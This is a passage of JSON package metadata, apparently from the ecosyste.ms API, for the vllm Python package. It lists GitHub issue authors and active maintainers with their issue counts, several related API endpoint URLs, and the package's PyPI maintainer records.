te","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yeqcharlotte"},{"login":"joerunde","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joerunde"},{"login":"benchislett","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benchislett"},{"login":"NickLucche","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NickLucche"},{"login":"zixi-qi","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zixi-qi"},{"login":"chaunceyjiang","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chaunceyjiang"},{"login":"zyongye","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zyongye"},{"login":"yangw-dev","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yangw-dev"},{"login":"andoorve","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andoorve"},{"login":"bigPYJ1151","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigPYJ1151"},{"login":"Alexei-V-Ivanov-AMD","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Alexei-V-Ivanov-AMD"},{"login":"kouroshHakha","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kouroshHakha"},{"login":"sroy745","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sroy745"},{"login":"alexm-neuralmagic","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexm-neuralmagic"},{"login":"zhewenl","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhewenl"},{"login":"aoshen02","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aoshen02"},{"login":"liuzijing2014","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liuzijing2014"},{"login":"jikunshang","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jikunshang"},{"login":"sighingnow","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sighingnow"},{"login":"rzabarazesh","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rzabarazesh"},{"login":"sangstar","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sangstar"},{"login":"ApostaC","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ApostaC"},{"login":"abmfy","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/abmfy"},{"login":"leandrohstein","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"suquark","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/suquark"},{"login":"noooop","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noooop"},{"login":"ZJY0516","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ZJY0516"},{"login":"morgendave","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/morgendave"},{"login":"patrickvonplaten","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/patrickvonplaten"},{"login":"ivanium","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ivanium"},{"login":"gty111","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gty111"},{"login":"TheEpicDolphin","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheEpicDolphin"},{"login":"Yikun","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yikun"},{"login":"tjtanaa","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tjtanaa"},{"login":"merrymercy","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/merrymercy"},{"login":"HAIAI","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HAIAI"},{"login":"ChuanLi1101","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ChuanLi1101"},{"login":"sidhpurwala-huzaifa","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidhpurwala-huzaifa"},{"login":"richardliaw","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/richardliaw"},{"login":"Rohan138","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Rohan138"},{"login":"shen-shanshan","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shen-shanshan"},{"login":"MatthewBonanni","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MatthewBonanni"},{"login":"KernelClint","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KernelClint"},{"login":"seanmcguire12","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/seanmcguire12"},{"login":"robinsteuteville","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/robinsteuteville"},{"login":"vmoens","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vmoens"},{"login":"vadiklyutiy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vadiklyutiy"},{"login":"bnellnm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bnellnm"},{"login":"Drakon4ik-Coder","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Drakon4ik-Coder"},{"login":"thiagoelg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/thiagoelg"},{"login":"TriTacLe","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TriTacLe"},{"login":"Ying1123","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Ying1123"},{"login":"pytorchbot","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pytorchbot"},{"login":"ahjing99","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ahjing99"},{"login":"rolfbjarne","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rolfbjarne"},{"login":"BenjamenMeyer","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BenjamenMeyer"},{"login":"Ethanscharlie","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Ethanscharlie"},{"login":"lgrammel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lgrammel"},{"login":"zhisbug","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhisbug"},{"login":"wambugucoder","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wambugucoder"},{"login":"paddyroddy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/paddyroddy"},{"login":"kushanam","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kushanam"},{"login":"PaulHax","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PaulHax"},{"login":"duanmeng","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/duanmeng"},{"login":"vszakats","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vszakats"},{"login":"ljedrz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljedrz"},{"login":"pavanimajety","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pavanimajety"},{"login":"danieljurek","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danieljurek"},{"login":"hakadao","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hakadao"}],"active_maintainers":[{"login":"AndreasKaratzas","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/AndreasKaratzas"},{"login":"DarkLight1337","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DarkLight1337"},{"login":"mgoin","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mgoin"},{"login":"hmellor","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hmellor"},{"login":"LucasWilkinson","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/LucasWilkinson"},{"login":"yewentao256","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yewentao256"},{"login":"aoshen02","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aoshen02"},{"login":"njhill","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/njhill"},{"login":"benchislett","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benchislett"},{"login":"khluu","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/khluu"},{"login":"Isotr0py","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Isotr0py"},{"login":"chaunceyjiang","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chaunceyjiang"},{"login":"tdoublep","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tdoublep"},{"login":"ywang96","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ywang96"},{"login":"jeejeelee","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeejeelee"},{"login":"ProExpertProg","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ProExpertProg"},{"login":"noooop","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noooop"},{"login":"heheda12345","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/heheda12345"},{"login":"tlrmchlsmth","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tlrmchlsmth"},{"login":"ZJY0516","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ZJY0516"},{"login":"robertgshaw2-redhat","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/robertgshaw2-redhat"},{"login":"rzabarazesh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rzabarazesh"},{"login":"TheEpicDolphin","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheEpicDolphin"},{"login":"tjtanaa","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tjtanaa"},{"login":"NickLucche","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NickLucche"},{"login":"zyongye","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zyongye"},{"login":"22quinn","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/22quinn"},{"login":"gty111","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gty111"},{"login":"ivanium","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ivanium"},{"login":"hongxiayang","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hongxiayang"},{"login":"Alexei-V-Ivanov-AMD","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Alexei-V-Ivanov-AMD"},{"login":"alexm-redhat","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexm-redhat"},{"login":"ChuanLi1101","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ChuanLi1101"},{"login":"simon-mo","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/simon-mo"},{"login":"shen-shanshan","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shen-shanshan"},{"login":"MatthewBonanni","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MatthewBonanni"},{"login":"markmc","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/markmc"},{"login":"Rohan138","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Rohan138"},{"login":"KernelClint","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KernelClint"},{"login":"patrickvonplaten","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/patrickvonplaten"},{"login":"zixi-qi","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zixi-qi"},{"login":"zhuohan123","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhuohan123"},{"login":"zhewenl","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhewenl"},{"login":"luccafong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/luccafong"},{"login":"bnellnm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bnellnm"},{"login":"WoosukKwon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/WoosukKwon"},{"login":"vadiklyutiy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vadiklyutiy"},{"login":"kouroshHakha","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kouroshHakha"},{"login":"esmeetu","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/esmeetu"},{"login":"gshtras","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gshtras"},{"login":"pavanimajety","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pavanimajety"},{"login":"sighingnow","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sighingnow"},{"login":"russellb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/russellb"},{"login":"ruisearch42","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ruisearch42"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/vllm/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/vllm/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/vllm/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/vllm/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/vllm/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/vllm/codemeta","maintainers":[{"uuid":"youkaichao","login":"youkaichao","name":null,"email":null,"url":null,"packages_count":7,"html_url":"https://pypi.org/user/youkaichao/","role":"Owner","created_at":"2024-08-20T13:54:54.219Z","updated_at":"2024-08-20T13:54:54.219Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/youkaichao/packages"},{"uuid":"wskwon","login":"wskwon","name":null,"email":null,"url":null,"packages_count":4,"html_url":"https://pypi.org/user/wskwon/","role":null,"created_at":"2023-07-06T02:42:18.414Z","updated_at":"2023-07-06T02:42:18.414Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/wskwon/packages"},{"uuid":"zhuohan123","login":"zhuohan123","name":null,"email":null,"url":null,"packages_count":1,"html_url":"https://pypi.org/user/zhuohan123/","role":null,"created_at":"2023-07-06T02:42:18.461Z","updated_at":"2023-07-06T02:42:18.461Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/zhuohan123/packages"}]}